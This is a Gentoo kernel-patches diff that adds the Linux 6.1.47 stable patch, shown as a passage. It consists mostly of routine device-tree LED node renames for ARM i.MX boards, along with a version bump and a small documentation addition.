 0000_README             |    4 +
 1046_linux-6.1.47.patch | 8047 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 8051 insertions(+)

diff --git a/0000_README b/0000_README
index c1bcb313..0ad2cca2 100644
--- a/0000_README
+++ b/0000_README
@@ -227,6 +227,10 @@ Patch:  1045_linux-6.1.46.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.46
 
+Patch:  1046_linux-6.1.47.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.47
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1046_linux-6.1.47.patch b/1046_linux-6.1.47.patch
new file mode 100644
index 00000000..ab31fe98
--- /dev/null
+++ b/1046_linux-6.1.47.patch
@@ -0,0 +1,8047 @@
+diff --git a/Documentation/admin-guide/kernel-parameters.txt b/Documentation/admin-guide/kernel-parameters.txt
+index 286be425f3bfa..882b6198dd0d1 100644
+--- a/Documentation/admin-guide/kernel-parameters.txt
++++ b/Documentation/admin-guide/kernel-parameters.txt
+@@ -323,6 +323,7 @@
+ 				       option with care.
+ 			pgtbl_v1     - Use v1 page table for DMA-API (Default).
+ 			pgtbl_v2     - Use v2 page table for DMA-API.
++			irtcachedis  - Disable Interrupt Remapping Table (IRT) caching.
+ 
+ 	amd_iommu_dump=	[HW,X86-64]
+ 			Enable AMD IOMMU driver option to dump the ACPI table
+diff --git a/Makefile b/Makefile
+index bdb965177db52..375efcfb91f8f 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 46
++SUBLEVEL = 47
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/boot/dts/imx50-kobo-aura.dts b/arch/arm/boot/dts/imx50-kobo-aura.dts
+index 51bf6117fb124..467db6b4ed7f8 100644
+--- a/arch/arm/boot/dts/imx50-kobo-aura.dts
++++ b/arch/arm/boot/dts/imx50-kobo-aura.dts
+@@ -26,7 +26,7 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_leds>;
+ 
+-		on {
++		led-on {
+ 			label = "kobo_aura:orange:on";
+ 			gpios = <&gpio6 24 GPIO_ACTIVE_LOW>;
+ 			panic-indicator;
+diff --git a/arch/arm/boot/dts/imx53-cx9020.dts b/arch/arm/boot/dts/imx53-cx9020.dts
+index cfb18849a92b4..055d23a9aee7c 100644
+--- a/arch/arm/boot/dts/imx53-cx9020.dts
++++ b/arch/arm/boot/dts/imx53-cx9020.dts
+@@ -86,27 +86,27 @@
+ 	leds {
+ 		compatible = "gpio-leds";
+ 
+-		pwr-r {
++		led-pwr-r {
+ 			gpios = <&gpio3 22 GPIO_ACTIVE_HIGH>;
+ 			default-state = "off";
+ 		};
+ 
+-		pwr-g {
++		led-pwr-g {
+ 			gpios = <&gpio3 24 GPIO_ACTIVE_HIGH>;
+ 			default-state = "on";
+ 		};
+ 
+-		pwr-b {
++		led-pwr-b {
+ 			gpios = <&gpio3 23 GPIO_ACTIVE_HIGH>;
+ 			default-state = "off";
+ 		};
+ 
+-		sd1-b {
++		led-sd1-b {
+ 			linux,default-trigger = "mmc0";
+ 			gpios = <&gpio3 20 GPIO_ACTIVE_HIGH>;
+ 		};
+ 
+-		sd2-b {
++		led-sd2-b {
+ 			linux,default-trigger = "mmc1";
+ 			gpios = <&gpio3 17 GPIO_ACTIVE_HIGH>;
+ 		};
+diff --git a/arch/arm/boot/dts/imx53-m53evk.dts b/arch/arm/boot/dts/imx53-m53evk.dts
+index a1a6228d1aa66..2bd2432d317ff 100644
+--- a/arch/arm/boot/dts/imx53-m53evk.dts
++++ b/arch/arm/boot/dts/imx53-m53evk.dts
+@@ -52,13 +52,13 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&led_pin_gpio>;
+ 
+-		user1 {
++		led-user1 {
+ 			label = "user1";
+ 			gpios = <&gpio2 8 0>;
+ 			linux,default-trigger = "heartbeat";
+ 		};
+ 
+-		user2 {
++		led-user2 {
+ 			label = "user2";
+ 			gpios = <&gpio2 9 0>;
+ 			linux,default-trigger = "heartbeat";
+diff --git a/arch/arm/boot/dts/imx53-m53menlo.dts b/arch/arm/boot/dts/imx53-m53menlo.dts
+index d5c68d1ea707c..4d77b6077fc1b 100644
+--- a/arch/arm/boot/dts/imx53-m53menlo.dts
++++ b/arch/arm/boot/dts/imx53-m53menlo.dts
+@@ -34,19 +34,19 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_led>;
+ 
+-		user1 {
++		led-user1 {
+ 			label = "TestLed601";
+ 			gpios = <&gpio6 1 GPIO_ACTIVE_HIGH>;
+ 			linux,default-trigger = "mmc0";
+ 		};
+ 
+-		user2 {
++		led-user2 {
+ 			label = "TestLed602";
+ 			gpios = <&gpio6 2 GPIO_ACTIVE_HIGH>;
+ 			linux,default-trigger = "heartbeat";
+ 		};
+ 
+-		eth {
++		led-eth {
+ 			label = "EthLedYe";
+ 			gpios = <&gpio2 11 GPIO_ACTIVE_LOW>;
+ 			linux,default-trigger = "netdev";
+diff --git a/arch/arm/boot/dts/imx53-tx53.dtsi b/arch/arm/boot/dts/imx53-tx53.dtsi
+index 892dd1a4bac35..a439a47fb65ac 100644
+--- a/arch/arm/boot/dts/imx53-tx53.dtsi
++++ b/arch/arm/boot/dts/imx53-tx53.dtsi
+@@ -94,7 +94,7 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_stk5led>;
+ 
+-		user {
++		led-user {
+ 			label = "Heartbeat";
+ 			gpios = <&gpio2 20 GPIO_ACTIVE_HIGH>;
+ 			linux,default-trigger = "heartbeat";
+diff --git a/arch/arm/boot/dts/imx53-usbarmory.dts b/arch/arm/boot/dts/imx53-usbarmory.dts
+index f34993a490ee8..acc44010d5106 100644
+--- a/arch/arm/boot/dts/imx53-usbarmory.dts
++++ b/arch/arm/boot/dts/imx53-usbarmory.dts
+@@ -67,7 +67,7 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_led>;
+ 
+-		user {
++		led-user {
+ 			label = "LED";
+ 			gpios = <&gpio4 27 GPIO_ACTIVE_LOW>;
+ 			linux,default-trigger = "heartbeat";
+diff --git a/arch/arm/boot/dts/imx6dl-b1x5pv2.dtsi b/arch/arm/boot/dts/imx6dl-b1x5pv2.dtsi
+index 337db29b0010a..37697fac9dea9 100644
+--- a/arch/arm/boot/dts/imx6dl-b1x5pv2.dtsi
++++ b/arch/arm/boot/dts/imx6dl-b1x5pv2.dtsi
+@@ -211,17 +211,17 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_q7_gpio1 &pinctrl_q7_gpio3 &pinctrl_q7_gpio5>;
+ 
+-		alarm1 {
++		led-alarm1 {
+ 			label = "alarm:red";
+ 			gpios = <&gpio1 8 GPIO_ACTIVE_HIGH>;
+ 		};
+ 
+-		alarm2 {
++		led-alarm2 {
+ 			label = "alarm:yellow";
+ 			gpios = <&gpio4 27 GPIO_ACTIVE_HIGH>;
+ 		};
+ 
+-		alarm3 {
++		led-alarm3 {
+ 			label = "alarm:blue";
+ 			gpios = <&gpio4 15 GPIO_ACTIVE_HIGH>;
+ 		};
+diff --git a/arch/arm/boot/dts/imx6dl-prtrvt.dts b/arch/arm/boot/dts/imx6dl-prtrvt.dts
+index 56bb1ca56a2df..36b031236e475 100644
+--- a/arch/arm/boot/dts/imx6dl-prtrvt.dts
++++ b/arch/arm/boot/dts/imx6dl-prtrvt.dts
+@@ -124,6 +124,10 @@
+ 	status = "disabled";
+ };
+ 
++&usbotg {
++	disable-over-current;
++};
++
+ &vpu {
+ 	status = "disabled";
+ };
+diff --git a/arch/arm/boot/dts/imx6dl-riotboard.dts b/arch/arm/boot/dts/imx6dl-riotboard.dts
+index e7be05f205d32..24c7f535f63bd 100644
+--- a/arch/arm/boot/dts/imx6dl-riotboard.dts
++++ b/arch/arm/boot/dts/imx6dl-riotboard.dts
+@@ -25,14 +25,14 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_led>;
+ 
+-		led0: user1 {
++		led0: led-user1 {
+ 			label = "user1";
+ 			gpios = <&gpio5 2 GPIO_ACTIVE_LOW>;
+ 			default-state = "on";
+ 			linux,default-trigger = "heartbeat";
+ 		};
+ 
+-		led1: user2 {
++		led1: led-user2 {
+ 			label = "user2";
+ 			gpios = <&gpio3 28 GPIO_ACTIVE_LOW>;
+ 			default-state = "off";
+diff --git a/arch/arm/boot/dts/imx6dl-yapp4-common.dtsi b/arch/arm/boot/dts/imx6dl-yapp4-common.dtsi
+index 52162e8c7274b..aacbf317feea6 100644
+--- a/arch/arm/boot/dts/imx6dl-yapp4-common.dtsi
++++ b/arch/arm/boot/dts/imx6dl-yapp4-common.dtsi
+@@ -274,7 +274,7 @@
+ 		#address-cells = <1>;
+ 		#size-cells = <0>;
+ 
+-		chan@0 {
++		led@0 {
+ 			chan-name = "R";
+ 			led-cur = /bits/ 8 <0x20>;
+ 			max-cur = /bits/ 8 <0x60>;
+@@ -282,7 +282,7 @@
+ 			color = <LED_COLOR_ID_RED>;
+ 		};
+ 
+-		chan@1 {
++		led@1 {
+ 			chan-name = "G";
+ 			led-cur = /bits/ 8 <0x20>;
+ 			max-cur = /bits/ 8 <0x60>;
+@@ -290,7 +290,7 @@
+ 			color = <LED_COLOR_ID_GREEN>;
+ 		};
+ 
+-		chan@2 {
++		led@2 {
+ 			chan-name = "B";
+ 			led-cur = /bits/ 8 <0x20>;
+ 			max-cur = /bits/ 8 <0x60>;
+diff --git a/arch/arm/boot/dts/imx6q-gw5400-a.dts b/arch/arm/boot/dts/imx6q-gw5400-a.dts
+index e894faba571f9..522a51042965a 100644
+--- a/arch/arm/boot/dts/imx6q-gw5400-a.dts
++++ b/arch/arm/boot/dts/imx6q-gw5400-a.dts
+@@ -34,20 +34,20 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_gpio_leds>;
+ 
+-		led0: user1 {
++		led0: led-user1 {
+ 			label = "user1";
+ 			gpios = <&gpio4 6 GPIO_ACTIVE_HIGH>; /* 102 -> MX6_PANLEDG */
+ 			default-state = "on";
+ 			linux,default-trigger = "heartbeat";
+ 		};
+ 
+-		led1: user2 {
++		led1: led-user2 {
+ 			label = "user2";
+ 			gpios = <&gpio4 10 GPIO_ACTIVE_HIGH>; /* 106 -> MX6_PANLEDR */
+ 			default-state = "off";
+ 		};
+ 
+-		led2: user3 {
++		led2: led-user3 {
+ 			label = "user3";
+ 			gpios = <&gpio4 15 GPIO_ACTIVE_LOW>; /* 111 -> MX6_LOCLED# */
+ 			default-state = "off";
+diff --git a/arch/arm/boot/dts/imx6q-h100.dts b/arch/arm/boot/dts/imx6q-h100.dts
+index b8feadbff967d..6406ade14f57b 100644
+--- a/arch/arm/boot/dts/imx6q-h100.dts
++++ b/arch/arm/boot/dts/imx6q-h100.dts
+@@ -76,19 +76,19 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_h100_leds>;
+ 
+-		led0: power {
++		led0: led-power {
+ 			label = "power";
+ 			gpios = <&gpio3 0 GPIO_ACTIVE_LOW>;
+ 			default-state = "on";
+ 		};
+ 
+-		led1: stream {
++		led1: led-stream {
+ 			label = "stream";
+ 			gpios = <&gpio2 29 GPIO_ACTIVE_LOW>;
+ 			default-state = "off";
+ 		};
+ 
+-		led2: rec {
++		led2: led-rec {
+ 			label = "rec";
+ 			gpios = <&gpio2 28 GPIO_ACTIVE_LOW>;
+ 			default-state = "off";
+diff --git a/arch/arm/boot/dts/imx6q-kp.dtsi b/arch/arm/boot/dts/imx6q-kp.dtsi
+index 1ade0bff681d6..5e0ed55600405 100644
+--- a/arch/arm/boot/dts/imx6q-kp.dtsi
++++ b/arch/arm/boot/dts/imx6q-kp.dtsi
+@@ -66,14 +66,14 @@
+ 	leds {
+ 		compatible = "gpio-leds";
+ 
+-		green {
++		led-green {
+ 			label = "led1";
+ 			gpios = <&gpio3 16 GPIO_ACTIVE_HIGH>;
+ 			linux,default-trigger = "gpio";
+ 			default-state = "off";
+ 		};
+ 
+-		red {
++		led-red {
+ 			label = "led0";
+ 			gpios = <&gpio3 23 GPIO_ACTIVE_HIGH>;
+ 			linux,default-trigger = "gpio";
+diff --git a/arch/arm/boot/dts/imx6q-marsboard.dts b/arch/arm/boot/dts/imx6q-marsboard.dts
+index cc18010023942..2c9961333b0a8 100644
+--- a/arch/arm/boot/dts/imx6q-marsboard.dts
++++ b/arch/arm/boot/dts/imx6q-marsboard.dts
+@@ -73,14 +73,14 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_led>;
+ 
+-		user1 {
++		led-user1 {
+ 			label = "imx6:green:user1";
+ 			gpios = <&gpio5 2 GPIO_ACTIVE_LOW>;
+ 			default-state = "off";
+ 			linux,default-trigger = "heartbeat";
+ 		};
+ 
+-		user2 {
++		led-user2 {
+ 			label = "imx6:green:user2";
+ 			gpios = <&gpio3 28 GPIO_ACTIVE_LOW>;
+ 			default-state = "off";
+diff --git a/arch/arm/boot/dts/imx6q-tbs2910.dts b/arch/arm/boot/dts/imx6q-tbs2910.dts
+index 8daef65d5bb35..2f576e2ce73f2 100644
+--- a/arch/arm/boot/dts/imx6q-tbs2910.dts
++++ b/arch/arm/boot/dts/imx6q-tbs2910.dts
+@@ -49,7 +49,7 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_gpio_leds>;
+ 
+-		blue {
++		led-blue {
+ 			label = "blue_status_led";
+ 			gpios = <&gpio1 2 GPIO_ACTIVE_HIGH>;
+ 			default-state = "keep";
+diff --git a/arch/arm/boot/dts/imx6qdl-emcon.dtsi b/arch/arm/boot/dts/imx6qdl-emcon.dtsi
+index 7228b894a763f..ee2dd75cead6d 100644
+--- a/arch/arm/boot/dts/imx6qdl-emcon.dtsi
++++ b/arch/arm/boot/dts/imx6qdl-emcon.dtsi
+@@ -46,14 +46,14 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_som_leds>;
+ 
+-		green {
++		led-green {
+ 			label = "som:green";
+ 			gpios = <&gpio3 0 GPIO_ACTIVE_HIGH>;
+ 			linux,default-trigger = "heartbeat";
+ 			default-state = "on";
+ 		};
+ 
+-		red {
++		led-red {
+ 			label = "som:red";
+ 			gpios = <&gpio3 1 GPIO_ACTIVE_LOW>;
+ 			default-state = "keep";
+diff --git a/arch/arm/boot/dts/imx6qdl-gw51xx.dtsi b/arch/arm/boot/dts/imx6qdl-gw51xx.dtsi
+index 069c27fab432c..e75e1a5364b85 100644
+--- a/arch/arm/boot/dts/imx6qdl-gw51xx.dtsi
++++ b/arch/arm/boot/dts/imx6qdl-gw51xx.dtsi
+@@ -71,14 +71,14 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_gpio_leds>;
+ 
+-		led0: user1 {
++		led0: led-user1 {
+ 			label = "user1";
+ 			gpios = <&gpio4 6 GPIO_ACTIVE_HIGH>; /* MX6_PANLEDG */
+ 			default-state = "on";
+ 			linux,default-trigger = "heartbeat";
+ 		};
+ 
+-		led1: user2 {
++		led1: led-user2 {
+ 			label = "user2";
+ 			gpios = <&gpio4 7 GPIO_ACTIVE_HIGH>; /* MX6_PANLEDR */
+ 			default-state = "off";
+diff --git a/arch/arm/boot/dts/imx6qdl-gw52xx.dtsi b/arch/arm/boot/dts/imx6qdl-gw52xx.dtsi
+index 728810b9d677d..47d9a8d08197d 100644
+--- a/arch/arm/boot/dts/imx6qdl-gw52xx.dtsi
++++ b/arch/arm/boot/dts/imx6qdl-gw52xx.dtsi
+@@ -80,20 +80,20 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_gpio_leds>;
+ 
+-		led0: user1 {
++		led0: led-user1 {
+ 			label = "user1";
+ 			gpios = <&gpio4 6 GPIO_ACTIVE_HIGH>; /* MX6_PANLEDG */
+ 			default-state = "on";
+ 			linux,default-trigger = "heartbeat";
+ 		};
+ 
+-		led1: user2 {
++		led1: led-user2 {
+ 			label = "user2";
+ 			gpios = <&gpio4 7 GPIO_ACTIVE_HIGH>; /* MX6_PANLEDR */
+ 			default-state = "off";
+ 		};
+ 
+-		led2: user3 {
++		led2: led-user3 {
+ 			label = "user3";
+ 			gpios = <&gpio4 15 GPIO_ACTIVE_LOW>; /* MX6_LOCLED# */
+ 			default-state = "off";
+diff --git a/arch/arm/boot/dts/imx6qdl-gw53xx.dtsi b/arch/arm/boot/dts/imx6qdl-gw53xx.dtsi
+index 6c0c109046d80..fb1d29abe0991 100644
+--- a/arch/arm/boot/dts/imx6qdl-gw53xx.dtsi
++++ b/arch/arm/boot/dts/imx6qdl-gw53xx.dtsi
+@@ -80,20 +80,20 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_gpio_leds>;
+ 
+-		led0: user1 {
++		led0: led-user1 {
+ 			label = "user1";
+ 			gpios = <&gpio4 6 GPIO_ACTIVE_HIGH>; /* MX6_PANLEDG */
+ 			default-state = "on";
+ 			linux,default-trigger = "heartbeat";
+ 		};
+ 
+-		led1: user2 {
++		led1: led-user2 {
+ 			label = "user2";
+ 			gpios = <&gpio4 7 GPIO_ACTIVE_HIGH>; /* MX6_PANLEDR */
+ 			default-state = "off";
+ 		};
+ 
+-		led2: user3 {
++		led2: led-user3 {
+ 			label = "user3";
+ 			gpios = <&gpio4 15 GPIO_ACTIVE_LOW>; /* MX6_LOCLED# */
+ 			default-state = "off";
+diff --git a/arch/arm/boot/dts/imx6qdl-gw54xx.dtsi b/arch/arm/boot/dts/imx6qdl-gw54xx.dtsi
+index a9b04f9f1c2bc..4e20cb97058eb 100644
+--- a/arch/arm/boot/dts/imx6qdl-gw54xx.dtsi
++++ b/arch/arm/boot/dts/imx6qdl-gw54xx.dtsi
+@@ -81,20 +81,20 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_gpio_leds>;
+ 
+-		led0: user1 {
++		led0: led-user1 {
+ 			label = "user1";
+ 			gpios = <&gpio4 6 GPIO_ACTIVE_HIGH>; /* MX6_PANLEDG */
+ 			default-state = "on";
+ 			linux,default-trigger = "heartbeat";
+ 		};
+ 
+-		led1: user2 {
++		led1: led-user2 {
+ 			label = "user2";
+ 			gpios = <&gpio4 7 GPIO_ACTIVE_HIGH>; /* MX6_PANLEDR */
+ 			default-state = "off";
+ 		};
+ 
+-		led2: user3 {
++		led2: led-user3 {
+ 			label = "user3";
+ 			gpios = <&gpio4 15 GPIO_ACTIVE_LOW>; /* MX6_LOCLED# */
+ 			default-state = "off";
+diff --git a/arch/arm/boot/dts/imx6qdl-gw551x.dtsi b/arch/arm/boot/dts/imx6qdl-gw551x.dtsi
+index 435dec6338fe6..0fa4b8eeddee7 100644
+--- a/arch/arm/boot/dts/imx6qdl-gw551x.dtsi
++++ b/arch/arm/boot/dts/imx6qdl-gw551x.dtsi
+@@ -115,7 +115,7 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_gpio_leds>;
+ 
+-		led0: user1 {
++		led0: led-user1 {
+ 			label = "user1";
+ 			gpios = <&gpio4 7 GPIO_ACTIVE_LOW>;
+ 			default-state = "on";
+diff --git a/arch/arm/boot/dts/imx6qdl-gw552x.dtsi b/arch/arm/boot/dts/imx6qdl-gw552x.dtsi
+index 2e61102ae6946..77ae611b817a4 100644
+--- a/arch/arm/boot/dts/imx6qdl-gw552x.dtsi
++++ b/arch/arm/boot/dts/imx6qdl-gw552x.dtsi
+@@ -72,20 +72,20 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_gpio_leds>;
+ 
+-		led0: user1 {
++		led0: led-user1 {
+ 			label = "user1";
+ 			gpios = <&gpio4 6 GPIO_ACTIVE_HIGH>; /* MX6_PANLEDG */
+ 			default-state = "on";
+ 			linux,default-trigger = "heartbeat";
+ 		};
+ 
+-		led1: user2 {
++		led1: led-user2 {
+ 			label = "user2";
+ 			gpios = <&gpio4 7 GPIO_ACTIVE_HIGH>; /* MX6_PANLEDR */
+ 			default-state = "off";
+ 		};
+ 
+-		led2: user3 {
++		led2: led-user3 {
+ 			label = "user3";
+ 			gpios = <&gpio4 15 GPIO_ACTIVE_LOW>; /* MX6_LOCLED# */
+ 			default-state = "off";
+diff --git a/arch/arm/boot/dts/imx6qdl-gw553x.dtsi b/arch/arm/boot/dts/imx6qdl-gw553x.dtsi
+index 4662408b225a5..7f16c602cc075 100644
+--- a/arch/arm/boot/dts/imx6qdl-gw553x.dtsi
++++ b/arch/arm/boot/dts/imx6qdl-gw553x.dtsi
+@@ -113,14 +113,14 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_gpio_leds>;
+ 
+-		led0: user1 {
++		led0: led-user1 {
+ 			label = "user1";
+ 			gpios = <&gpio4 10 GPIO_ACTIVE_HIGH>; /* MX6_PANLEDG */
+ 			default-state = "on";
+ 			linux,default-trigger = "heartbeat";
+ 		};
+ 
+-		led1: user2 {
++		led1: led-user2 {
+ 			label = "user2";
+ 			gpios = <&gpio4 11 GPIO_ACTIVE_HIGH>; /* MX6_PANLEDR */
+ 			default-state = "off";
+diff --git a/arch/arm/boot/dts/imx6qdl-gw560x.dtsi b/arch/arm/boot/dts/imx6qdl-gw560x.dtsi
+index 4b81a975c979d..46cf4080fec38 100644
+--- a/arch/arm/boot/dts/imx6qdl-gw560x.dtsi
++++ b/arch/arm/boot/dts/imx6qdl-gw560x.dtsi
+@@ -139,20 +139,20 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_gpio_leds>;
+ 
+-		led0: user1 {
++		led0: led-user1 {
+ 			label = "user1";
+ 			gpios = <&gpio4 6 GPIO_ACTIVE_HIGH>; /* MX6_PANLEDG */
+ 			default-state = "on";
+ 			linux,default-trigger = "heartbeat";
+ 		};
+ 
+-		led1: user2 {
++		led1: led-user2 {
+ 			label = "user2";
+ 			gpios = <&gpio4 7 GPIO_ACTIVE_HIGH>; /* MX6_PANLEDR */
+ 			default-state = "off";
+ 		};
+ 
+-		led2: user3 {
++		led2: led-user3 {
+ 			label = "user3";
+ 			gpios = <&gpio4 15 GPIO_ACTIVE_LOW>; /* MX6_LOCLED# */
+ 			default-state = "off";
+diff --git a/arch/arm/boot/dts/imx6qdl-gw5903.dtsi b/arch/arm/boot/dts/imx6qdl-gw5903.dtsi
+index 1fdb7ba630f1b..a74cde0501589 100644
+--- a/arch/arm/boot/dts/imx6qdl-gw5903.dtsi
++++ b/arch/arm/boot/dts/imx6qdl-gw5903.dtsi
+@@ -123,7 +123,7 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_gpio_leds>;
+ 
+-		led0: user1 {
++		led0: led-user1 {
+ 			label = "user1";
+ 			gpios = <&gpio6 14 GPIO_ACTIVE_LOW>; /* MX6_LOCLED# */
+ 			default-state = "off";
+diff --git a/arch/arm/boot/dts/imx6qdl-gw5904.dtsi b/arch/arm/boot/dts/imx6qdl-gw5904.dtsi
+index 612b6e068e282..9fc79af2bc9aa 100644
+--- a/arch/arm/boot/dts/imx6qdl-gw5904.dtsi
++++ b/arch/arm/boot/dts/imx6qdl-gw5904.dtsi
+@@ -120,20 +120,20 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_gpio_leds>;
+ 
+-		led0: user1 {
++		led0: led-user1 {
+ 			label = "user1";
+ 			gpios = <&gpio4 6 GPIO_ACTIVE_HIGH>; /* MX6_PANLEDG */
+ 			default-state = "on";
+ 			linux,default-trigger = "heartbeat";
+ 		};
+ 
+-		led1: user2 {
++		led1: led-user2 {
+ 			label = "user2";
+ 			gpios = <&gpio4 7 GPIO_ACTIVE_HIGH>; /* MX6_PANLEDR */
+ 			default-state = "off";
+ 		};
+ 
+-		led2: user3 {
++		led2: led-user3 {
+ 			label = "user3";
+ 			gpios = <&gpio4 15 GPIO_ACTIVE_LOW>; /* MX6_LOCLED# */
+ 			default-state = "off";
+diff --git a/arch/arm/boot/dts/imx6qdl-gw5907.dtsi b/arch/arm/boot/dts/imx6qdl-gw5907.dtsi
+index fcd3bdfd61827..955a51226eda7 100644
+--- a/arch/arm/boot/dts/imx6qdl-gw5907.dtsi
++++ b/arch/arm/boot/dts/imx6qdl-gw5907.dtsi
+@@ -71,14 +71,14 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_gpio_leds>;
+ 
+-		led0: user1 {
++		led0: led-user1 {
+ 			label = "user1";
+ 			gpios = <&gpio4 6 GPIO_ACTIVE_HIGH>; /* MX6_PANLEDG */
+ 			default-state = "on";
+ 			linux,default-trigger = "heartbeat";
+ 		};
+ 
+-		led1: user2 {
++		led1: led-user2 {
+ 			label = "user2";
+ 			gpios = <&gpio4 7 GPIO_ACTIVE_HIGH>; /* MX6_PANLEDR */
+ 			default-state = "off";
+diff --git a/arch/arm/boot/dts/imx6qdl-gw5910.dtsi b/arch/arm/boot/dts/imx6qdl-gw5910.dtsi
+index 6bb4855d13ce5..218d6e667ed24 100644
+--- a/arch/arm/boot/dts/imx6qdl-gw5910.dtsi
++++ b/arch/arm/boot/dts/imx6qdl-gw5910.dtsi
+@@ -74,20 +74,20 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_gpio_leds>;
+ 
+-		led0: user1 {
++		led0: led-user1 {
+ 			label = "user1";
+ 			gpios = <&gpio4 6 GPIO_ACTIVE_HIGH>; /* MX6_PANLEDG */
+ 			default-state = "on";
+ 			linux,default-trigger = "heartbeat";
+ 		};
+ 
+-		led1: user2 {
++		led1: led-user2 {
+ 			label = "user2";
+ 			gpios = <&gpio4 7 GPIO_ACTIVE_HIGH>; /* MX6_PANLEDR */
+ 			default-state = "off";
+ 		};
+ 
+-		led2: user3 {
++		led2: led-user3 {
+ 			label = "user3";
+ 			gpios = <&gpio4 15 GPIO_ACTIVE_LOW>; /* MX6_LOCLED# */
+ 			default-state = "off";
+diff --git a/arch/arm/boot/dts/imx6qdl-gw5912.dtsi b/arch/arm/boot/dts/imx6qdl-gw5912.dtsi
+index 0415bcb416400..40e235e315cc4 100644
+--- a/arch/arm/boot/dts/imx6qdl-gw5912.dtsi
++++ b/arch/arm/boot/dts/imx6qdl-gw5912.dtsi
+@@ -72,20 +72,20 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_gpio_leds>;
+ 
+-		led0: user1 {
++		led0: led-user1 {
+ 			label = "user1";
+ 			gpios = <&gpio4 6 GPIO_ACTIVE_HIGH>; /* MX6_PANLEDG */
+ 			default-state = "on";
+ 			linux,default-trigger = "heartbeat";
+ 		};
+ 
+-		led1: user2 {
++		led1: led-user2 {
+ 			label = "user2";
+ 			gpios = <&gpio4 7 GPIO_ACTIVE_HIGH>; /* MX6_PANLEDR */
+ 			default-state = "off";
+ 		};
+ 
+-		led2: user3 {
++		led2: led-user3 {
+ 			label = "user3";
+ 			gpios = <&gpio4 15 GPIO_ACTIVE_LOW>; /* MX6_LOCLED# */
+ 			default-state = "off";
+diff --git a/arch/arm/boot/dts/imx6qdl-gw5913.dtsi b/arch/arm/boot/dts/imx6qdl-gw5913.dtsi
+index 696427b487f01..82f47c295b085 100644
+--- a/arch/arm/boot/dts/imx6qdl-gw5913.dtsi
++++ b/arch/arm/boot/dts/imx6qdl-gw5913.dtsi
+@@ -71,14 +71,14 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_gpio_leds>;
+ 
+-		led0: user1 {
++		led0: led-user1 {
+ 			label = "user1";
+ 			gpios = <&gpio4 6 GPIO_ACTIVE_HIGH>; /* MX6_PANLEDG */
+ 			default-state = "on";
+ 			linux,default-trigger = "heartbeat";
+ 		};
+ 
+-		led1: user2 {
++		led1: led-user2 {
+ 			label = "user2";
+ 			gpios = <&gpio4 7 GPIO_ACTIVE_HIGH>; /* MX6_PANLEDR */
+ 			default-state = "off";
+diff --git a/arch/arm/boot/dts/imx6qdl-nit6xlite.dtsi b/arch/arm/boot/dts/imx6qdl-nit6xlite.dtsi
+index a53a5d0766a51..6d4eab1942b94 100644
+--- a/arch/arm/boot/dts/imx6qdl-nit6xlite.dtsi
++++ b/arch/arm/boot/dts/imx6qdl-nit6xlite.dtsi
+@@ -85,31 +85,31 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_leds>;
+ 
+-		j14-pin1 {
++		led-j14-pin1 {
+ 			gpios = <&gpio1 2 GPIO_ACTIVE_LOW>;
+ 			retain-state-suspended;
+ 			default-state = "off";
+ 		};
+ 
+-		j14-pin3 {
++		led-j14-pin3 {
+ 			gpios = <&gpio1 3 GPIO_ACTIVE_LOW>;
+ 			retain-state-suspended;
+ 			default-state = "off";
+ 		};
+ 
+-		j14-pins8-9 {
++		led-j14-pins8-9 {
+ 			gpios = <&gpio3 29 GPIO_ACTIVE_LOW>;
+ 			retain-state-suspended;
+ 			default-state = "off";
+ 		};
+ 
+-		j46-pin2 {
++		led-j46-pin2 {
+ 			gpios = <&gpio1 7 GPIO_ACTIVE_LOW>;
+ 			retain-state-suspended;
+ 			default-state = "off";
+ 		};
+ 
+-		j46-pin3 {
++		led-j46-pin3 {
+ 			gpios = <&gpio1 8 GPIO_ACTIVE_LOW>;
+ 			retain-state-suspended;
+ 			default-state = "off";
+diff --git a/arch/arm/boot/dts/imx6qdl-nitrogen6_max.dtsi b/arch/arm/boot/dts/imx6qdl-nitrogen6_max.dtsi
